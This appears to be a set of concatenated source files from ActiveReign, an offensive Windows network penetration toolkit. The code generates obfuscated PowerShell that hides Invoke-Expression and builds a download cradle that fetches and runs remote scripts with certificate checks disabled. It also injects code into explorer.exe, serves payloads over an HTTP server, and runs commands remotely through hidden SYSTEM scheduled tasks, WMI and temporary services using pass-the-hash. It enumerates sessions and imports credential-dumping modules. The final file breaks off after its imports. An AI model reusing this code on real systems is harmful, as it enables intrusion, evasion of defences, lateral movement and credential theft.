baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'." + split + "(" + choice(['', ' ']) + "'" + randomDelimitersToPrint + "'" + choice(['', ' ']) + ')' + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'" + choice(['', ' ']) + randomDelimitersToPrintForDashSplit + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
baseScriptArray.append('(' + choice(['', ' ']) + encodedArray + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
# Generate random JOIN syntax for all above options
newScriptArray = []
newScriptArray.append(choice(baseScriptArray) + choice(['', ' ']) + join + choice(['', ' ']) + "''")
newScriptArray.append(join + choice(['', ' ']) + choice(baseScriptArray))
newScriptArray.append(strJoin + '(' + choice(['', ' ']) + "''" + choice(['', ' ']) + ',' + choice(['', ' ']) + choice(baseScriptArray) + choice(['', ' ']) + ')')
newScriptArray.append('"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVar + choice(['', ' ']) + ')' + choice(['', ' ']) + '"' + choice(['', ' ']) + '+' + choice(['', ' ']) + strStr + choice(baseScriptArray) + choice(['', ' ']) + '+' + '"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVarBack + choice(['', ' ']) + ')' + choice(['', ' ']) + '"')
# Randomly select one of the above commands.
newScript = choice(newScriptArray)
# Generate random invoke operation syntax.
# Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies.
invokeExpressionSyntax = []
invokeExpressionSyntax.append(choice(['IEX', 'Invoke-Expression']))
# Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &.
# Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet.
# These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc.
invocationOperator = choice(['.','&']) + choice(['', ' '])
invokeExpressionSyntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')")
invokeExpressionSyntax.append(invocationOperator + "( $PSHome[" + choice(['4', '21']) + "]+$PSHOME[" + choice(['30', '34']) + "]+'x')")
invokeExpressionSyntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')")
invokeExpressionSyntax.append(invocationOperator + "( $env:ComSpec[4," + choice(['15', '24', '26']) + ",25]-Join'')")
invokeExpressionSyntax.append(invocationOperator + "((" + choice(['Get-Variable','GV','Variable']) + " '*mdr*').Name[3,11,2]-Join'')")
invokeExpressionSyntax.append(invocationOperator + "( " + choice(['$VerbosePreference.ToString()','([String]$VerbosePreference)']) + "[1,3]+'x'-Join'')")
# Randomly choose from above invoke operation syntaxes.
invokeExpression = choice(invokeExpressionSyntax)
# Randomize the case of selected invoke operation.
invokeExpression = ''.join(choice([i.upper(), i.lower()]) for i in invokeExpression)
# Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
invokeOptions = []
invokeOptions.append(choice(['', ' ']) + invokeExpression + choice(['', ' ']) + '(' + choice(['', ' ']) + newScript + choice(['', ' ']) + ')' + choice(['', ' ']))
invokeOptions.append(choice(['', ' ']) + newScript + choice(['', ' ']) + '|' + choice(['', ' ']) + invokeExpression)
obfuscatedPayload = choice(invokeOptions)
return obfuscatedPayload
############################
# Script Execution
############################
def clean_ps_script(script_path):
with open(script_path, 'r') as script:
# strip block comments
strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', script.read())
# strip blank lines, lines starting with #, and verbose/debug statements
strippedCode = "\n".join([line for line in strippedCode.split('\n') if
((line.strip() != '') and (not line.strip().startswith("#")) and
(not line.strip().lower().startswith("write-verbose ")) and
(not line.strip().lower().startswith("write-debug ")))])
return strippedCode
def gen_ps_iex_cradle(script, command=str('')):
#Generate a powershell download cradle
# Windows 2008 R2 / Windows 7 = Ssl3,Tls - tls1.1,1.2 disabled by default
# no longer need to check os since we always using tls1 on the httpserver now.
launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}\n"
launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls'\n"
launcher += "IEX (New-Object Net.WebClient).DownloadString('{}');\n".format(script)
launcher += command
return launcher.strip()
############################
# Module Execution
############################
def gen_ps_inject(command, context=None, procname='explorer.exe', inject_once=False):
# The following code gives us some control over where and how Invoke-PSInject does its thang
# It prioritizes injecting into a process of the active console session
ps_code = '''
$injected = $False
$inject_once = {inject_once}
$command = "{command}"
$owners = @{{}}
$console_login = gwmi win32_computersystem | select -exp Username
gwmi win32_process | where {{$_.Name.ToLower() -eq '{procname}'.ToLower()}} | % {{
if ($_.getowner().domain -and $_.getowner().user){{
$owners[$_.getowner().domain + "\\" + $_.getowner().user] = $_.handle
}}
}}
try {{
if ($owners.ContainsKey($console_login)){{
Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command
$injected = $True
$owners.Remove($console_login)
}}
}}
catch {{}}
if (($injected -eq $False) -or ($inject_once -eq $False)){{
foreach ($owner in $owners.Values) {{
try {{
Invoke-PSInject -ProcId $owner -PoshCode $command
}}
catch {{}}
}}
}}
'''.format(inject_once='$True' if inject_once else '$False',
command=encode_ps_command(command), procname=procname)
if context:
return gen_ps_iex_cradle(context, 'Invoke-PSInject.ps1', ps_code, post_back=False)
return ps_code | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/helpers/powershell.py | powershell.py |
import re
import socket
from os import path
from requests import post
from random import choice
from base64 import b64encode
from datetime import datetime
from string import ascii_letters, digits
from urllib3 import disable_warnings, exceptions
disable_warnings(exceptions.InsecureRequestWarning)
def get_local_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("1.1.1.1", 53))
x = s.getsockname()[0]
s.close()
return x
except:
return '127.0.0.1'
def get_ip(host):
try:
return socket.gethostbyname(host)
except:
return host
def gen_random_string(length=6):
return''.join([choice(ascii_letters + digits) for x in range(length)])
def get_timestamp():
return datetime.now().strftime('%m-%d-%Y %H:%M:%S')
def get_filestamp():
# Timestamp formatted for filenames
return datetime.now().strftime('%m-%d-%y-%H%M%S')
def slack_post(api_token, channel, data):
header = {
'Content-Type' : 'application/json;charset=utf-8',
'Authorization' : 'Bearer {}'.format(api_token),
}
post_data = {
'as_user' : True,
'channel' : channel,
'text' : data
}
return post('https://slack.com/api/chat.postMessage', verify=False, headers=header, json=post_data)
def ps_encoder(command):
cmd = b64encode(command)
if len(cmd) >= 8191:
return False
return cmd
def validate_ntlm(data):
allowed = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
if allowed.match(data):
return True
else:
return False
def file_exists(parser, filename, contents=True):
# Used with argparse to check if input files exists
if not path.exists(filename):
parser.error("Input file not found: {}".format(filename))
if contents:
# return file contents
return [x.strip() for x in open(filename)]
else:
# return status
return filename | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/helpers/misc.py | misc.py |
import os
import socket
from threading import Thread
from ar3.helpers.powershell import clean_ps_script
class RequestHandler():
def __init__(self, sock, addr, logger):
self.logger = logger
self.resp = "HTTP/1.1 200 OK\r\n"
self.resp += "Server: IIS\r\n"
try:
request = sock.recv(4096).decode('utf-8')
headers = self.unpack_headers(request)
page = self.get_page(headers)
logger.info(["{}:{}".format(addr[0], addr[1]), addr[0], "HTTP SERVER", headers[0]])
self.send_payload(sock, page)
except Exception as e:
logger.debug(["{}:{}".format(addr[0], addr[1]), addr[0], "HTTP SERVER", str(e)])
self.default(sock)
sock.close()
def unpack_headers(self, headers):
return headers.splitlines()
def get_page(self,headers):
page = headers[0].split(" ")
return page[1][1:]
def send_payload(self, sock, page):
file = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', page)
if os.path.exists(file):
payload = clean_ps_script(file)
self.resp += "Content-Type: text/plain; charset-utf-8\r\n"
self.resp += "Content-Length: {}\r\n\r\n".format(len(payload))
self.resp += payload
sock.sendall(self.resp.encode('UTF-8'))
self.logger.debug("Finished serving payload: {}".format(page))
else:
self.logger.debug('Invalid payload requested: \'{}\''.format(page))
def default(self, sock):
self.resp += "Content-Type: text/html\r\n\r\n"
self.resp += "<html><body>It Works!</body></html>"
sock.send(self.resp.encode('UTF-8'))
def ar3_server(logger):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.bind(('0.0.0.0', 80))
except:
logger.fail("HTTP server failed to bind to 0.0.0.0:80")
exit(1)
sock.listen(20)
while True:
client_socket, addr = sock.accept()
try:
Thread(target=RequestHandler, args=(client_socket,addr,logger,), daemon=True).start()
except Exception as e:
try:
client_socket.close()
except:
pass | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/servers/http.py | http.py |
import os
import shutil
import threading
from sys import exit
from impacket import smbserver
from impacket.ntlm import compute_lmhash, compute_nthash
class SMBServer(threading.Thread):
def __init__(self, logger, share_name, share_path='/tmp/.ar3', share_comment = '', username= '', password='', listen_address='0.0.0.0', listen_port=445, verbose=False):
self.running = True
self._smb2support = False
self._share_path = share_path
try:
threading.Thread.__init__(self)
# If suggested share_path not exist, create
if not os.path.exists(share_path):
os.makedirs(share_path)
# Setup SMB Server
self.server = smbserver.SimpleSMBServer(listen_address, int(listen_port))
self.server.addShare(share_name, share_path, share_comment)
if verbose:
self.server.setLogFile('')
self.server.setSMB2Support(self._smb2support)
self.server.setSMBChallenge('')
if username:
if password:
lmhash = compute_lmhash(password)
nthash = compute_nthash(password)
self.server.addCredential(username, 0, lmhash, nthash)
except Exception as e:
errno, message = e.args
if errno == 98 and message == 'Address already in use':
logger.fail('Error starting SMB server on port 445: the port is already in use')
else:
logger.fail('Error starting SMB server on port 445: {}'.format(message))
exit(1)
def addShare(self, share_name, share_path, share_comment):
self.server.addShare(share_name.upper(), share_path, share_comment)
def run(self):
try:
self.server.start()
except Exception as e:
pass
def cleanup_server(self):
try:
shutil.rmtree(self._share_path)
except:
pass
def shutdown(self):
'''Not in use, only way I found
to shutdown server was _exit()'''
self.cleanup_server()
self._Thread__stop()
# make sure all the threads are killed
for thread in threading.enumerate():
if thread.isAlive():
try:
thread._Thread__stop()
except Exception as e:
self.logger.debug(str(e)) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/servers/smb.py | smb.py |
import os
from time import sleep
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import tsch, transport
from ar3.helpers.misc import gen_random_string, get_local_ip
class TSCHEXEC():
def __init__(self, logger, host, args, smb_con, share_name=False):
self.outfile = gen_random_string()
self.debug = args.debug
self.logger = logger
self.host = host
self.domain = args.domain
self.username = args.user
self.password = args.passwd
self.hash = args.hash
self.lmhash = ''
self.nthash = ''
self.noOutput = args.no_output
self.outputBuffer = ''
self.timeout = args.timeout
self.smbcon = smb_con
self.fileless_output = False
if share_name:
# Fileless output
self.fileless_output = True
self.ip = get_local_ip()
self.share = share_name
self.path = "\\"
else:
# Filed or Remote output
self.ip = args.exec_ip
self.share = args.exec_share
self.path = args.exec_path
if self.hash:
try:
self.lmhash, self.nthash = self.hash.split(':')
except:
self.nthash = self.hash
def execute(self, command):
self.__outputBuffer = ''
stringbinding = r'ncacn_np:{}[\pipe\atsvc]'.format(self.host)
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(self.__rpctransport, 'set_credentials'):
self.__rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)
if self.fileless_output:
self.tmpfile = "\\\\{}\\{}{}".format(self.ip, self.share, self.path+self.outfile)
else:
self.tmpfile = "%windir%\\Temp\\{}".format(self.outfile)
self.doStuff(command)
return self.__outputBuffer
def gen_xml(self, command):
xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>cmd.exe</Command>
"""
if self.noOutput:
argument_xml = " <Arguments>/C {}</Arguments>".format(command)
else:
argument_xml = " <Arguments>/C {} > {} 2>&1</Arguments>".format(command, self.tmpfile)
self.logger.debug('Generated argument XML: ' + argument_xml)
xml += argument_xml
xml += """
</Exec>
</Actions>
</Task>
"""
return xml
def doStuff(self, command):
dce = self.__rpctransport.get_dce_rpc()
dce.set_credentials(*self.__rpctransport.get_credentials())
dce.connect()
#dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
dce.bind(tsch.MSRPC_UUID_TSCHS)
tmpName = gen_random_string(8)
tmpFileName = tmpName + '.tmp'
xml = self.gen_xml(command)
taskCreated = False
self.logger.debug('Creating task \\{}'.format(tmpName))
tsch.hSchRpcRegisterTask(dce, '\\{}'.format(tmpName), xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
taskCreated = True
self.logger.debug('Running task \\{}'.format(tmpName))
tsch.hSchRpcRun(dce, '\\{}'.format(tmpName))
done = False
while not done:
self.logger.debug('Calling SchRpcGetLastRunInfo for \\{}'.format(tmpName))
resp = tsch.hSchRpcGetLastRunInfo(dce, '\\{}'.format(tmpName))
if resp['pLastRuntime']['wYear'] != 0:
done = True
else:
sleep(2)
self.logger.debug('Deleting task \\{}'.format(tmpName))
tsch.hSchRpcDelete(dce, '\\{}'.format(tmpName))
taskCreated = False
if taskCreated is True:
tsch.hSchRpcDelete(dce, '\\{}'.format(tmpName))
# Get output
if self.noOutput:
self.__outputBuffer = "Command executed with no output"
elif self.fileless_output:
self.get_output_fileless()
else:
self.get_output()
dce.disconnect()
def get_output(self):
def output_callback(data):
self.__outputBuffer += data.decode('utf-8')
waitOnce = True
while True:
try:
self.logger.debug('Attempting to read ADMIN$\\Temp\\{}'.format(self.outfile))
self.smbcon.con.getFile('ADMIN$', "Temp\\{}".format(self.outfile), output_callback)
break
except Exception as e:
if str(e).find('SHARING') > 0:
sleep(3)
elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
if waitOnce is True:
# We're giving it the chance to flush the file before giving up
sleep(3)
waitOnce = False
else:
raise
else:
raise
self.logger.debug('Deleting file ADMIN$\\Temp\\{}'.format(self.outfile))
self.smbcon.con.deleteFile('ADMIN$', 'Temp\\{}'.format(self.outfile))
def get_output_fileless(self):
def output_callback_fileless(data):
self.__outputBuffer += data
while True:
try:
with open(os.path.join('/tmp', '.ar3', self.outfile), 'r') as output:
output_callback_fileless(output.read())
break
except IOError:
sleep(2) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/atexec.py | atexec.py |
import os
from time import sleep
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from ar3.helpers.misc import gen_random_string, get_local_ip
class WMIEXEC():
def __init__(self, logger, host, args, smb_con, share_name=False):
self.outfile = gen_random_string()
self.debug = args.debug
self.logger = logger
self.host = host
self.domain = args.domain
self.username = args.user
self.password = args.passwd
self.hash = args.hash
self.lmhash = ''
self.nthash = ''
self.pwd = str('C:\\')
self.shell = 'cmd.exe /Q /c '
self.noOutput = args.no_output
self.outputBuffer = ''
self.timeout = args.timeout
self.smbcon = smb_con
self.fileless_output = False
if share_name:
# Fileless output
self.fileless_output = True
self.ip = get_local_ip()
self.share = share_name
self.path = "\\"
else:
# Filed or Remote output
self.ip = args.exec_ip
self.share = args.exec_share
self.path = args.exec_path
if self.hash:
try:
self.lmhash, self.nthash = self.hash.split(':')
except:
self.nthash = self.hash
def create_wmi_con(self):
self.dcom = DCOMConnection(self.host, self.username, self.password, self.domain, self.lmhash, self.nthash)
iInterface = self.dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin('\\\\{}\\root\\cimv2'.format(self.host), NULL, NULL)
iWbemLevel1Login.RemRelease()
self.win32Process, _ = iWbemServices.GetObject('Win32_Process')
def execute(self, command):
self.create_wmi_con()
self.logger.debug( "WMIExec: DCOM connection created")
# Init New Command
self.__outputBuffer = ''
if self.noOutput:
cmd = self.shell + command
else:
cmd = self.shell + command + " 1> \\\\{}\\{}{} 2>&1".format(self.ip, self.share, self.path + self.outfile)
self.logger.debug( "WMIexec: {}".format(cmd))
self.win32Process.Create(cmd, self.pwd, None)
self.logger.debug( "Win32 Process Created")
# Get output
if self.noOutput:
self.__outputBuffer = "Command executed with no output"
elif self.fileless_output:
self.get_output_fileless()
else:
self.get_output()
self.logger.debug( "Disconnecting win32 process")
self.dcom.disconnect()
return self.__outputBuffer
def get_output(self, CODEC='UTF-8'):
def output_callback(data):
try:
self.__outputBuffer += data.decode(CODEC)
except UnicodeDecodeError:
self.__outputBuffer += data.decode(CODEC, errors='replace')
while True:
try:
self.smbcon.con.getFile(self.share, "{}{}".format(self.path, self.outfile), output_callback)
break
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
# Output not finished, let's wait
sleep(1)
elif str(e).find('Broken') >= 0:
# The SMB Connection might have timed out, let's try reconnecting
self.logger.debug( 'Connection broken, trying to recreate it')
self.smbcon.con.reconnect()
return self.get_output()
# Cleanup, delete tmp outfile
self.smbcon.con.deleteFile(self.share, "{}{}".format(self.path.replace('\\','/'), self.outfile))
def get_output_fileless(self):
def output_callback_fileless(data):
self.__outputBuffer += data
while True:
try:
with open(os.path.join('/tmp', '.ar3', self.outfile), 'r') as output:
output_callback_fileless(output.read())
break
except IOError:
sleep(2) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/wmiexec.py | wmiexec.py |
import socket
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
from impacket.dcerpc.v5 import transport, wkst, srvs, samr, scmr, drsuapi, epm
from ar3.core.connector import Connector
class RpcCon(Connector):
def __init__(self, args, loggers, host):
Connector.__init__(self, args, loggers, host)
self.pipe = None
self.rpc_connection = None
self.dcom = None
self.wmi_connection = None
self.port = 445
def create_rpc_con(self, pipe):
# Here we build the DCE/RPC connection
self.pipe = pipe
binding_strings = dict()
binding_strings['srvsvc'] = srvs.MSRPC_UUID_SRVS
binding_strings['wkssvc'] = wkst.MSRPC_UUID_WKST
binding_strings['samr'] = samr.MSRPC_UUID_SAMR
binding_strings['svcctl'] = scmr.MSRPC_UUID_SCMR
binding_strings['drsuapi'] = drsuapi.MSRPC_UUID_DRSUAPI
if self.pipe == r'\drsuapi':
string_binding = epm.hept_map(self.host, drsuapi.MSRPC_UUID_DRSUAPI, protocol='ncacn_ip_tcp')
rpctransport = transport.DCERPCTransportFactory(string_binding)
rpctransport.set_credentials(username=self.username, password=self.password,domain=self.domain, lmhash=self.lmhash,nthash=self.nthash)
else:
rpctransport = transport.SMBTransport(self.host, self.port, self.pipe,username=self.username, password=self.password, domain=self.domain, lmhash=self.lmhash,nthash=self.nthash)
# SET TIMEOUT
rpctransport.set_connect_timeout(self.timeout)
dce = rpctransport.get_dce_rpc()
if self.pipe == r'\drsuapi':
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
try:
dce.connect()
except socket.error:
self.rpc_connection = None
else:
dce.bind(binding_strings[self.pipe[1:]])
self.rpc_connection = dce
def list_services(self):
services = {}
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py
self.create_rpc_con(r'\svcctl')
ans = scmr.hROpenSCManagerW(self.rpc_connection)
scManagerHandle = ans['lpScHandle']
resp = scmr.hREnumServicesStatusW(self.rpc_connection, scManagerHandle)
for i in range(len(resp)):
name = resp[i]['lpServiceName'][:-1]
services[name] = {}
services[name]['Name'] = name
services[name]['Display'] = resp[i]['lpDisplayName'][:-1]
state = resp[i]['ServiceStatus']['dwCurrentState']
if state == scmr.SERVICE_CONTINUE_PENDING:
services[name]['Status'] = "CONTINUE PENDING"
elif state == scmr.SERVICE_PAUSE_PENDING:
services[name]['Status'] = "PAUSE PENDING"
elif state == scmr.SERVICE_PAUSED:
services[name]['Status'] = "PAUSED"
elif state == scmr.SERVICE_RUNNING:
services[name]['Status'] = "RUNNING"
elif state == scmr.SERVICE_START_PENDING:
services[name]['Status'] = "START PENDING"
elif state == scmr.SERVICE_STOP_PENDING:
services[name]['Status'] = "STOP PENDING"
elif state == scmr.SERVICE_STOPPED:
services[name]['Status'] = "STOPPED"
else:
services[name]['Status'] = "UNKNOWN"
self.rpc_connection.disconnect()
return services
def get_netsessions(self):
self.sessions = {}
self.create_rpc_con(r'\srvsvc')
try:
resp = srvs.hNetrSessionEnum(self.rpc_connection, '\x00', NULL, 10)
except DCERPCException:
return list()
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
self.sessions[session['sesi10_username'].strip('\x00')] = {'user' : session['sesi10_username'].strip('\x00'),
'host' : session['sesi10_cname'].strip('\x00'),
'time' : session['sesi10_time'],
'idle' : session['sesi10_idle_time']
}
self.rpc_connection.disconnect()
def get_netloggedon(self):
self.loggedon = {}
self.create_rpc_con(r'\wkssvc')
try:
resp = wkst.hNetrWkstaUserEnum(self.rpc_connection, 1)
except DCERPCException as e:
return list()
results = list()
for wksta_user in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
self.loggedon[wksta_user['wkui1_username'].strip('\x00')] = {
'domain' : wksta_user['wkui1_logon_domain'].strip('\x00'),
'logon_srv' : wksta_user['wkui1_logon_server'].strip('\x00'),
'user' : wksta_user['wkui1_username'].strip('\x00'),
}
self.rpc_connection.disconnect() | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/rpc.py | rpc.py |
import os
from time import sleep
from impacket.smbconnection import *
from impacket.dcerpc.v5 import transport, scmr
from ar3.helpers.misc import gen_random_string, get_local_ip
class SMBEXEC():
def __init__(self, logger, host, args, smb_con, port=445, share_name=False):
self.logger = logger
self.outfile = gen_random_string()
self.batchFile = gen_random_string() + '.bat'
self.__serviceName = gen_random_string()
self.__rpctransport = None
self.__scmr = None
self.__conn = None
self.__shell = '%COMSPEC% /Q /c '
# self.__mode = mode
# self.__aesKey = aesKey
# self.__doKerberos = doKerberos
# Auth
self.smbcon = smb_con
self.host = host
self.port = port
self.username = args.user
self.password = args.passwd
self.domain = args.domain
self.hash = args.hash
self.lmhash = ''
self.nthash = ''
self.timeout = args.timeout
self.debug = args.debug
self.noOutput = args.no_output
self.fileless_output = False
if share_name:
# Fileless output
self.fileless_output = True
self.ip = get_local_ip()
self.share = share_name
self.path = "\\"
else:
# Filed or Remote output
self.ip = args.exec_ip
self.share = args.exec_share
self.path = args.exec_path
if self.hash:
try:
self.lmhash, self.nthash = self.hash.split(':')
except:
self.nthash = self.hash
stringbinding = 'ncacn_np:{}[\pipe\svcctl]'.format(self.host)
self.logger.debug('StringBinding {}'.format(stringbinding))
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
self.__rpctransport.set_dport(self.port)
if hasattr(self.__rpctransport, 'setRemoteHost'):
self.__rpctransport.setRemoteHost(self.host)
if hasattr(self.__rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
self.__rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)
#rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
self.__scmr = self.__rpctransport.get_dce_rpc()
self.__scmr.connect()
s = self.__rpctransport.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(self.timeout)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
def execute(self, command):
# Init New Command
self.__outputBuffer = ''
if self.noOutput:
cmd = self.__shell + command
else:
cmd = self.__shell + command + " ^> \\\\{}\\{}{} 2>&1".format(self.ip, self.share, self.path + self.outfile)
self.logger.debug("SMBexec: {}".format(cmd))
# Write cmd to Service File for exec
self.logger.debug("Creating {} to execute command".format(self.batchFile))
if self.fileless_output:
# Create bat service on AR3 server share
with open(os.path.join('/tmp', '.ar3', self.batchFile), 'w') as batch_file:
batch_file.write(cmd)
else:
# Create .bat service on target system in /Windows/Temp to execute command
tid = self.smbcon.con.connectTree(self.share)
fid = self.smbcon.con.createFile(tid, "{}{}".format(self.path.replace('\\', '/'), self.batchFile))
self.smbcon.con.writeFile(tid, fid, cmd)
self.smbcon.con.closeFile(tid, fid)
# Create new CMD to execute .bat
service_command = self.__shell + '\\\\{}\\{}{}{}'.format(self.ip, self.share, self.path, self.batchFile)
self.logger.debug('Executing: ' + service_command)
# Create Service
self.logger.debug('Remote service {} created.'.format(self.__serviceName))
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=service_command, dwStartType=scmr.SERVICE_DEMAND_START)
service = resp['lpServiceHandle']
# Start Service
try:
self.logger.debug('Remote service {} started.'.format(self.__serviceName))
scmr.hRStartServiceW(self.__scmr, service)
except Exception as e:
pass
#self._outputBuffer += str(e)
# Delete Service
self.logger.debug('Remote service {} deleted.'.format(self.__serviceName))
scmr.hRDeleteService(self.__scmr, service,)
scmr.hRCloseServiceHandle(self.__scmr, service)
# Get output
if self.noOutput:
self.__outputBuffer = "Command executed with no output"
elif self.fileless_output:
self.get_output_fileless()
else:
self.get_output()
self.cleanup()
# Cleanup and return data
self.finish()
return self.__outputBuffer
def get_output(self, CODEC='UTF-8'):
def output_callback(data):
try:
self.__outputBuffer += data.decode(CODEC)
except UnicodeDecodeError:
self.__outputBuffer += data.decode(CODEC, errors='replace')
while True:
try:
self.smbcon.con.getFile(self.share, "{}{}".format(self.path, self.outfile), output_callback)
break
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
# Output not finished, let's wait
sleep(1)
elif str(e).find('Broken') >= 0:
# The SMB Connection might have timed out, let's try reconnecting
self.logger.debug('Connection broken, trying to recreate it')
self.smbcon.con.reconnect()
return self.get_output()
def get_output_fileless(self):
def output_callback_fileless(data):
self.__outputBuffer += data
while True:
try:
with open(os.path.join('/tmp', '.ar3', self.outfile), 'r') as output:
output_callback_fileless(output.read())
break
except IOError:
sleep(2)
def cleanup(self):
try:
self.smbcon.con.deleteFile(self.share, "{}{}".format(self.path.replace('\\', '/'), self.outfile))
self.logger.debug('Deleted output file: \\\\{}\\{}{}'.format(self.ip, self.share, self.path + self.outfile))
except:
pass
try:
self.smbcon.con.deleteFile(self.share, "{}{}".format(self.path.replace('\\', '/'), self.batchFile))
self.logger.debug('Deleted batch file: \\\\{}\\{}{}'.format(self.ip, self.share, self.path + self.batchFile))
except:
pass
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpctransport.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
except:
pass | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/smbexec.py | smbexec.py |
import os
from random import choice
from impacket.dcerpc.v5 import scmr
from impacket.smb import SMB_DIALECT
from string import ascii_letters, digits
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.transport import SMBTransport
from impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP
from impacket.smbconnection import SMBConnection, SessionError
from impacket.dcerpc.v5.transport import DCERPCTransportFactory
from impacket.examples.secretsdump import RemoteOperations, SAMHashes, NTDSHashes, LSASecrets
from ar3.helpers import remotefile
